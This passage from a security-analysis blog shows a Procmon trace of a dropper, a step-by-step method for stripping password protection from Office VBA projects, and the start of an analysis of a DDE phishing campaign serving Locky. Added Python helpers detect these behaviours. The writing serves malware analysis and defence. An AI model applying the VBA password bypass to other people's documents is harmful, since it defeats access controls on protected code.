</td><td style="border-right: 1px solid transparent; overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="border-right: 1px solid transparent; overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td></tr>
<tr style="height: 21px;"><td data-sheets-value="{"1":2,"2":"CreateFile"}" style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;">CreateFile</td><td data-sheets-value="{"1":2,"2":"C:\\Windows\\SysWOW64\\ntmarta.dll"}" style="border-right: 1px solid transparent; overflow: visible; padding: 2px 3px 2px 3px; vertical-align: bottom;"><div style="left: 3px; overflow: hidden; position: relative; white-space: nowrap; width: 297px;">
<div style="float: left;">
C:\Windows\SysWOW64\ntmarta.dll</div>
</div>
</td><td style="border-right: 1px solid transparent; overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td></tr>
<tr style="height: 21px;"><td data-sheets-value="{"1":2,"2":"SetEndOfFileInformationFile"}" style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;">SetEndOfFileInformationFile</td><td data-sheets-value="{"1":2,"2":"C:\\Users\\Vishal Thakur\\AppData\\Roaming\\services\\Uiaejdlat.exe"}" style="border-right: 1px solid transparent; overflow: visible; padding: 2px 3px 2px 3px; vertical-align: bottom;"><div style="left: 3px; overflow: hidden; position: relative; white-space: nowrap; width: 398px;">
<div style="float: left;">
C:\Users\Vishal Thakur\AppData\Roaming\services\Uiaejdlat.exe</div>
</div>
</td><td style="border-right: 1px solid transparent; overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="border-right: 1px solid transparent; overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td></tr>
<tr style="height: 21px;"><td data-sheets-value="{"1":2,"2":"WriteFile"}" style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;">WriteFile</td><td data-sheets-value="{"1":2,"2":"C:\\Users\\Vishal Thakur\\AppData\\Roaming\\services\\Uiaejdlat.exe"}" style="border-right: 1px solid transparent; overflow: visible; padding: 2px 3px 2px 3px; vertical-align: bottom;"><div style="left: 3px; overflow: hidden; position: relative; white-space: nowrap; width: 398px;">
<div style="float: left;">
C:\Users\Vishal Thakur\AppData\Roaming\services\Uiaejdlat.exe</div>
</div>
</td><td style="border-right: 1px solid transparent; overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="border-right: 1px solid transparent; overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td></tr>
<tr style="height: 21px;"><td data-sheets-value="{"1":2,"2":"Thread Exit"}" style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;">Thread Exit</td><td style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td></tr>
<tr style="height: 21px;"><td data-sheets-value="{"1":2,"2":"Process Exit"}" style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;">Process Exit</td><td style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td></tr>
<tr style="height: 21px;"><td data-sheets-value="{"1":2,"2":"CloseFile"}" style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;">CloseFile</td><td style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td></tr>
<tr style="height: 21px;"><td data-sheets-value="{"1":2,"2":"RegOpenKey"}" style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;">RegOpenKey</td><td data-sheets-value="{"1":2,"2":"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\Uiaejdlat.exe"}" style="border-right: 1px solid transparent; overflow: visible; padding: 2px 3px 2px 3px; vertical-align: bottom;"><div style="left: 3px; overflow: hidden; position: relative; white-space: nowrap; width: 600px;">
<div style="float: left;">
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Uiaejdlat.exe</div>
</div>
</td><td style="border-right: 1px solid transparent; overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="border-right: 1px solid transparent; overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="border-right: 1px solid transparent; overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="border-right: 1px solid transparent; overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td></tr>
<tr style="height: 21px;"><td data-sheets-value="{"1":2,"2":"CreateFile"}" style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;">CreateFile</td><td data-sheets-value="{"1":2,"2":"C:\\Users\\Vishal Thakur\\AppData\\Roaming\\services\\Uiaejdlat.exe"}" style="border-right: 1px solid transparent; overflow: visible; padding: 2px 3px 2px 3px; vertical-align: bottom;"><div style="left: 3px; overflow: hidden; position: relative; white-space: nowrap; width: 398px;">
<div style="float: left;">
C:\Users\Vishal Thakur\AppData\Roaming\services\Uiaejdlat.exe</div>
</div>
</td><td style="border-right: 1px solid transparent; overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="border-right: 1px solid transparent; overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td><td style="overflow: hidden; padding: 2px 3px 2px 3px; vertical-align: bottom;"><br /></td></tr>
</tbody></table>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
*Uiaejdlat.exe will obviously change with every binary - look out for the registry entries and file creations. </div>
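<div style="text-align: left;">
Added example (not part of the original post): a small Python check that applies the "look out for the reg entries and file creations" advice to Procmon-style (Operation, Path) events. It pairs an .exe written under a user's AppData tree with the later Image File Execution Options lookup for the same name, which is the loader's tell that the dropped file was started. The event list is a constructed sample modelled on the table above, with the user name replaced by a placeholder.</div>

```python
import re

# Constructed sample in Procmon's (Operation, Path) shape, modelled on the rows
# of the table above; the user name is a placeholder.
SAMPLE_EVENTS = [
    ("CreateFile", r"C:\Windows\SysWOW64\rpcss.dll"),
    ("RegOpenKey", r"HKLM\SYSTEM\CurrentControlSet\Control\Session Manager"),
    ("CreateFile", r"C:\Users\user\AppData\Roaming"),
    ("CreateFile", r"C:\Users\user\AppData\Roaming\services"),
    ("CreateFile", r"C:\Users\user\AppData\Roaming\services\Uiaejdlat.exe"),
    ("SetEndOfFileInformationFile", r"C:\Users\user\AppData\Roaming\services\Uiaejdlat.exe"),
    ("WriteFile", r"C:\Users\user\AppData\Roaming\services\Uiaejdlat.exe"),
    ("CreateFile", r"C:\Windows\SysWOW64\ntmarta.dll"),
    ("Thread Exit", ""),
    ("Process Exit", ""),
    ("RegOpenKey", r"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Uiaejdlat.exe"),
    ("CreateFile", r"C:\Users\user\AppData\Roaming\services\Uiaejdlat.exe"),
]

# An executable written somewhere under a user's AppData tree.
DROPPED_EXE_RE = re.compile(
    r"^[A-Z]:\\Users\\[^\\]+\\AppData\\(?:Roaming|Local|LocalLow)\\(?:.*\\)?([^\\]+\.exe)$", re.I)
# The loader reads this key for every image it is about to start, so an IFEO
# lookup for a name is a reliable sign that a process with that name was launched.
IFEO_RE = re.compile(
    r"^HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\([^\\]+\.exe)$", re.I)

WRITE_OPS = {"WriteFile", "SetEndOfFileInformationFile"}


def find_drop_and_execute(events):
    """Return (exe name, dropped path) pairs for executables that were written
    under AppData and afterwards launched, in trace order.

    Only the ordered pair matters: plenty of legitimate software writes under
    AppData, and IFEO lookups happen for every process, but a file that the
    traced process has just written and then starts is the dropper behaviour
    the table above shows."""
    written = {}     # lower-cased exe name -> path it was written to
    launched = []
    for op, path in events:
        m = DROPPED_EXE_RE.match(path)
        if m and op in WRITE_OPS:
            written[m.group(1).lower()] = path
            continue
        m = IFEO_RE.match(path)
        if m and op == "RegOpenKey" and m.group(1).lower() in written:
            launched.append((m.group(1), written[m.group(1).lower()]))
    return launched


if __name__ == "__main__":
    for exe, path in find_drop_and_execute(SAMPLE_EVENTS):
        print(f"dropped and executed: {exe} <- {path}")
```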
<br /></div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-1270838152641758291.post-56009211966946647512017-12-04T01:49:00.001-08:002017-12-04T01:49:45.972-08:00Cracking password protected VBA Project code - macro code in complex encryption <div dir="ltr" style="text-align: left;" trbidi="on">
It's pretty well documented on the internet how you can crack a password-protected VBA project in Office documents. It works in <i>almost</i> all cases :)<br />
<br />
If the document is protected using a different scheme, you will not find the DPB entry for the password in the hex dump. This becomes a bit of an annoyance.<br />
<br />
Here's how to crack it quickly.<br />
<br />
The file asks for a password when you try to look into the project code.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhldXEpZd-znzw1P9whGf49_-kNCgkbPBnB_MztV4tq8Quge8n8ZmRa_Z4InQyS3Nyc-m_SMJqqycST_LgrwjAE98XnOLncq1tt2Nlz5nPG25HsKCBFMSPUcrgM_uvTMqMnGwn1i0cUEOTJ/s1600/12.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="407" data-original-width="785" height="165" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhldXEpZd-znzw1P9whGf49_-kNCgkbPBnB_MztV4tq8Quge8n8ZmRa_Z4InQyS3Nyc-m_SMJqqycST_LgrwjAE98XnOLncq1tt2Nlz5nPG25HsKCBFMSPUcrgM_uvTMqMnGwn1i0cUEOTJ/s320/12.PNG" width="320" /></a></div>
<br />
1. Save the file on your desktop.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhLnMsDmsX1wyceZaVmVbQMHzgkX8DE8Cy0433V-XC-_E6KB45E7AsK8amwQEPbKNLJSnzOkv9VzFxKeQKGYwyumk4R2sSECal97W69KGH3Vo3q-xThVmTxOWKjbYdMtmITqdKPw5pqVJZd/s1600/1.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="157" data-original-width="579" height="86" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhLnMsDmsX1wyceZaVmVbQMHzgkX8DE8Cy0433V-XC-_E6KB45E7AsK8amwQEPbKNLJSnzOkv9VzFxKeQKGYwyumk4R2sSECal97W69KGH3Vo3q-xThVmTxOWKjbYdMtmITqdKPw5pqVJZd/s320/1.PNG" width="320" /></a></div>
<br />
Try to load this into a hex editor and see if you can find the DPB entry - you won't.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjdqPD6LcMtgNXkyYpT5_wzesCjv8qmJfibS9xsDR3z8TAq2qu4BXOPfohZHUNTLt_e45drulvrvZWhgud6oAoY8azvyup9wsMS3s-ZIuZaSjwAFFcPlImxU8W5l6Qb55mzmN16ApskTsdS/s1600/2.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="831" data-original-width="1415" height="187" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjdqPD6LcMtgNXkyYpT5_wzesCjv8qmJfibS9xsDR3z8TAq2qu4BXOPfohZHUNTLt_e45drulvrvZWhgud6oAoY8azvyup9wsMS3s-ZIuZaSjwAFFcPlImxU8W5l6Qb55mzmN16ApskTsdS/s320/2.PNG" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjZCiKwMUy3cGoeBN-1eBPPEMxBYmSZRRRJD2i72xyELPla5hhA23SGpqojr5gnwoSClyBOeiK6Glo0-hQlnMbL2RTCfQWNQeDx9HdtILQZwtCv9ll5V2VjnFqLKDjCKfVP0GVYHs17cthm/s1600/3.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="451" data-original-width="763" height="189" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjZCiKwMUy3cGoeBN-1eBPPEMxBYmSZRRRJD2i72xyELPla5hhA23SGpqojr5gnwoSClyBOeiK6Glo0-hQlnMbL2RTCfQWNQeDx9HdtILQZwtCv9ll5V2VjnFqLKDjCKfVP0GVYHs17cthm/s320/3.PNG" width="320" /></a></div>
<br />
Now follow on to the next step. <br />
<br />
2. Change the file extension to 'zip'<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi3LH-_mVsL9jdtv6GvIivB0Wb7DFz67YncNGUPxkL7VW77ao9XkpJjff9rDOWtfCrgCo7kzLNKEUNDuHEa7mxgwwY7eXDMeVOA8Pepz2UMenCG3BO-4s1RMmhp25m6OOxz0uniwueHYLit/s1600/4.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="177" data-original-width="621" height="91" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi3LH-_mVsL9jdtv6GvIivB0Wb7DFz67YncNGUPxkL7VW77ao9XkpJjff9rDOWtfCrgCo7kzLNKEUNDuHEa7mxgwwY7eXDMeVOA8Pepz2UMenCG3BO-4s1RMmhp25m6OOxz0uniwueHYLit/s320/4.PNG" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgdpN49FArx5Z5npCuTuFxTzjNLfn4-Hvbr2NDL-ix1rojSeh77DUmtL6GC0n2dqZbMJIwPfM2hdSBJjdi1FIHWmpjY3fhhktmjwGK8ZYCFTlP-OpzruHOCpWlw0Yqtp969QH7x47PZZRb0/s1600/5.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="193" data-original-width="557" height="110" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgdpN49FArx5Z5npCuTuFxTzjNLfn4-Hvbr2NDL-ix1rojSeh77DUmtL6GC0n2dqZbMJIwPfM2hdSBJjdi1FIHWmpjY3fhhktmjwGK8ZYCFTlP-OpzruHOCpWlw0Yqtp969QH7x47PZZRb0/s320/5.PNG" width="320" /></a></div>
<br />
3. Now simply double-click on this archive to enter the compressed file.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjcCda2pyg52ymsSipLCoWWEXqoqHJpdk611-9wtNG1Pi3dDLnmKkoDt_mwTzPvsVUmisiVTr_0cFt-zfY40G_c72OCmk5Tn-r7H03iq5rFVTxMTOJIGFZCjSOGphpHT0h_oMHP-nhsxUJu/s1600/6.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="341" data-original-width="657" height="166" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjcCda2pyg52ymsSipLCoWWEXqoqHJpdk611-9wtNG1Pi3dDLnmKkoDt_mwTzPvsVUmisiVTr_0cFt-zfY40G_c72OCmk5Tn-r7H03iq5rFVTxMTOJIGFZCjSOGphpHT0h_oMHP-nhsxUJu/s320/6.PNG" width="320" /></a></div>
<br />
You will see a bunch of stuff. Go into the 'word' folder and look for the .bin file.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3wFCuX_8ESXLCeNMBKejH2tEOobzh3qQbhdNZPY0hgp2WW7scvv76bvkvsNNVy6qZa_fpIZNAxxMcY48YSwXI99NF8EyfKBdZFbfY0sPAuV9rhJoqGUEIyJSNnaJSe8DoaVHtLU6JxI1v/s1600/7.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="767" data-original-width="771" height="318" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3wFCuX_8ESXLCeNMBKejH2tEOobzh3qQbhdNZPY0hgp2WW7scvv76bvkvsNNVy6qZa_fpIZNAxxMcY48YSwXI99NF8EyfKBdZFbfY0sPAuV9rhJoqGUEIyJSNnaJSe8DoaVHtLU6JxI1v/s320/7.PNG" width="320" /></a></div>
<br />
Now, copy the bin file (vbaProject.bin) to a different location and open it in your favourite hex editor and search for DPB.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhDo6yyHtJcgcIduBGkHea-0IgAAVCuSU1wpw33qkfY9JNfdGeXj0YU4tfNgYMP1oDt8fT-m5W01AdqDIB_pV4YR4PrlhOA3OWzTgezuUUHvdeZgejUrOjo9ZKS8XFXA3TfyjSggmS0JVis/s1600/8.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="765" data-original-width="1119" height="218" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhDo6yyHtJcgcIduBGkHea-0IgAAVCuSU1wpw33qkfY9JNfdGeXj0YU4tfNgYMP1oDt8fT-m5W01AdqDIB_pV4YR4PrlhOA3OWzTgezuUUHvdeZgejUrOjo9ZKS8XFXA3TfyjSggmS0JVis/s320/8.PNG" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhaf_2oDSha5Vh8Fh_LdVxkh7GAnIXFIClVvWE0UB3lrRRHc0aMc7xfiRuHTmlFNeGvnk3oY93-BZzdDfKnP0ScGntCi_UII5sorHMqDbaRvVCROYpzsXUwAJWyamAmy1h4zokVBhPrl491/s1600/9.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="378" data-original-width="845" height="142" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhaf_2oDSha5Vh8Fh_LdVxkh7GAnIXFIClVvWE0UB3lrRRHc0aMc7xfiRuHTmlFNeGvnk3oY93-BZzdDfKnP0ScGntCi_UII5sorHMqDbaRvVCROYpzsXUwAJWyamAmy1h4zokVBhPrl491/s320/9.PNG" width="320" /></a></div>
<br />
You will find it now.<br />
<br />
Change this to DPx and save the file.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgKl3FPS67CoUy3zkDniG_w7xNDAZT8oGlzg6s6LJf13x4vRU5g_tyfbFIb6Mi150-tPApIBoc-tMUP1lwbroucU5NvZqamTOlS514RjB8aJoFDBggrnmxxnjzgF-3-bBb3sl-QNDWU8O1L/s1600/10.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="685" data-original-width="1259" height="174" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgKl3FPS67CoUy3zkDniG_w7xNDAZT8oGlzg6s6LJf13x4vRU5g_tyfbFIb6Mi150-tPApIBoc-tMUP1lwbroucU5NvZqamTOlS514RjB8aJoFDBggrnmxxnjzgF-3-bBb3sl-QNDWU8O1L/s320/10.PNG" width="320" /></a></div>
<br />
4. Now, replace the bin file in the archive with this new file that you just saved. Note that we are not unzipping the file at any point.<br />
<br />
5. Move back up and rename the file extension back to .doc from .zip.<br />
<br />
6. Now open this file in Word - it will throw a bunch of errors, just click through them.<br />
<br />
7. Now, when you go into the project, it will not ask you for a password, but will still not show you the code. That's ok, it's expected. Don't panic, just go into the project properties and give it a new password. Save and exit.<br />
<br />
8. Re-launch the file in Word - go to the project, it'll ask you for a password. Give it the new password that you set.<br />
<br />
9. Enjoy.<br />
<br />
:)<br />
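Added example, not the author's: a Python triage helper for the two cases this post contrasts. It reports whether a file is a legacy OLE2 .doc (DPB= is visible to a raw hex search) or an OOXML zip (vbaProject.bin is stored deflate-compressed, so the hex search on the outer file misses it and the part has to be read out of the zip first, which is what the zip step above does), and which of the CMG/DPB/DPx/GC lock fields the PROJECT stream carries, including the DPx rename described above. The PROJECT text and the containers are constructed stand-ins with placeholder values.<br />

```python
import io
import zipfile

OLE_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"   # compound-file signature (legacy .doc, vbaProject.bin)
# PROJECT-stream properties that carry the project lock: CMG (protection state),
# DPB (password, obfuscated), GC (visibility). DPx is what the walkthrough above
# renames DPB to; Office no longer recognises the field and stops asking for a password.
FIELDS = (b"CMG=", b"DPB=", b"DPx=", b"GC=")

# Constructed stand-in for the text of a PROJECT stream inside vbaProject.bin.
# Values are placeholders, not real hashes; the repeated lines only make the
# sample large enough to deflate the way a real part does.
SAMPLE_PROJECT_TEXT = (
    b'ID="{00000000-0000-0000-0000-000000000000}"\r\n'
    b'Document=ThisDocument/&H00000000\r\n'
    b'Module=Module1\r\n'
    b'Name="Project"\r\n'
    b'HelpContextID="0"\r\n'
    b'CMG="0000000000000000"\r\n'
    b'DPB="0000000000000000"\r\n'
    b'GC="0000000000000000"\r\n'
) + b"[Host Extender Info]\r\n&H00000001=placeholder\r\n" * 40


def build_sample_docm(vba_bin: bytes) -> bytes:
    """Constructed OOXML container: a zip holding a fake word/vbaProject.bin part."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", "<w:document/>")
        zf.writestr("word/vbaProject.bin", vba_bin)
    return buf.getvalue()


def field_status(stream: bytes) -> dict:
    """Which lock-related PROJECT fields a vbaProject.bin blob carries.
    A substring search is enough because the PROJECT stream is plain text inside
    the compound file (that is what the hex-editor search above relies on)."""
    present = {f.decode().rstrip("="): f in stream for f in FIELDS}
    if present["DPx"] and not present["DPB"]:
        state = "DPB renamed to DPx (lock neutralised)"
    elif present["DPB"]:
        # DPB exists in every PROJECT stream, even without a password; only its
        # obfuscated value says whether a password is actually set.
        state = "DPB present (project may be password protected)"
    elif present["CMG"] or present["GC"]:
        state = "no DPB/DPx field"
    else:
        state = "no PROJECT stream fields found"
    return {"state": state, "fields": present}


def inspect_vba_protection(blob: bytes) -> dict:
    """Triage a document for VBA project lock fields.

    Legacy .doc files are compound files, so DPB= shows up in a hex search of
    the whole file. OOXML (.docm/.docx) is a zip whose vbaProject.bin part is
    deflate-compressed, so the same search on the outer file finds nothing and
    the part has to be inflated first."""
    report = {
        "container": "unknown",
        "raw_hex_search_hit": any(f in blob for f in (b"DPB=", b"DPx=")),
        "parts": {},
    }
    if blob.startswith(OLE_MAGIC):
        report["container"] = "ole2"
        report["parts"]["<whole file>"] = field_status(blob)
    elif zipfile.is_zipfile(io.BytesIO(blob)):
        report["container"] = "zip"
        with zipfile.ZipFile(io.BytesIO(blob)) as zf:
            for name in zf.namelist():
                if name.lower().endswith("vbaproject.bin"):
                    report["parts"][name] = field_status(zf.read(name))
    return report


if __name__ == "__main__":
    # The legacy sample is only the magic plus the PROJECT text, not a real compound file.
    for label, sample in (("ooxml", build_sample_docm(SAMPLE_PROJECT_TEXT)),
                          ("legacy", OLE_MAGIC + SAMPLE_PROJECT_TEXT)):
        r = inspect_vba_protection(sample)
        print(label, r["container"], "raw hex hit:", r["raw_hex_search_hit"])
        for part, st in r["parts"].items():
            print("  ", part, "->", st["state"])
```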
<br /></div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-1270838152641758291.post-38004532023665793852017-10-19T17:57:00.003-07:002017-10-19T17:58:47.278-07:00DDE vulnerability/feature exploited by Phishing campaign serving Locky Payload - Analysis<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="p1">
<span class="s1">This is one of the ongoing campaigns (started last night) using the DDE ‘feature’, serving Locky as a payload.</span></div>
<div class="p1">
<br /></div>
<div class="p1">
<span class="s1"><b>Flow:</b></span></div>
<div class="p1">
<span class="s1">Phish > Doc attachment > DDE code > download Base64 encoded string > execute decoded commands > payload > execute</span></div>
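<div class="p1">
Added example (not from the original post): a Python scanner that pulls every field instruction out of the WordprocessingML parts of an OOXML attachment and flags the DDE/DDEAUTO ones, joining instrText runs so an instruction split across runs is still caught. The document.xml is a constructed sample with a placeholder command, not the campaign's.</div>

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

W_NS = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"
W = "{%s}" % W_NS
DDE_RE = re.compile(r"\bDDE(?:AUTO)?\b", re.IGNORECASE)

# Constructed document.xml: one harmless PAGE field and one DDEAUTO field whose
# instruction is split across two <w:instrText> runs (a common way to defeat
# naive string matching). The command is a placeholder, not the campaign's.
SAMPLE_DOCUMENT_XML = (
    f'<w:document xmlns:w="{W_NS}"><w:body>'
    '<w:p><w:r><w:fldChar w:fldCharType="begin"/></w:r>'
    '<w:r><w:instrText> PAGE </w:instrText></w:r>'
    '<w:r><w:fldChar w:fldCharType="separate"/></w:r><w:r><w:t>1</w:t></w:r>'
    '<w:r><w:fldChar w:fldCharType="end"/></w:r></w:p>'
    '<w:p><w:r><w:fldChar w:fldCharType="begin"/></w:r>'
    '<w:r><w:instrText> DD</w:instrText></w:r>'
    '<w:r><w:instrText>EAUTO "C:\\placeholder\\app.exe" "placeholder args" </w:instrText></w:r>'
    '<w:r><w:fldChar w:fldCharType="separate"/></w:r>'
    '<w:r><w:t>Emailed Invoice</w:t></w:r>'
    '<w:r><w:fldChar w:fldCharType="end"/></w:r></w:p>'
    '</w:body></w:document>'
).encode()


def build_sample_docx(document_xml: bytes) -> bytes:
    """Constructed OOXML container holding the sample document.xml."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", document_xml)
    return buf.getvalue()


def field_instructions(part_xml: bytes) -> list:
    """All field instruction strings in one WordprocessingML part.

    Simple fields keep the instruction in w:fldSimple/@w:instr. Complex fields
    spread it over w:instrText runs between fldChar begin/end, possibly nested
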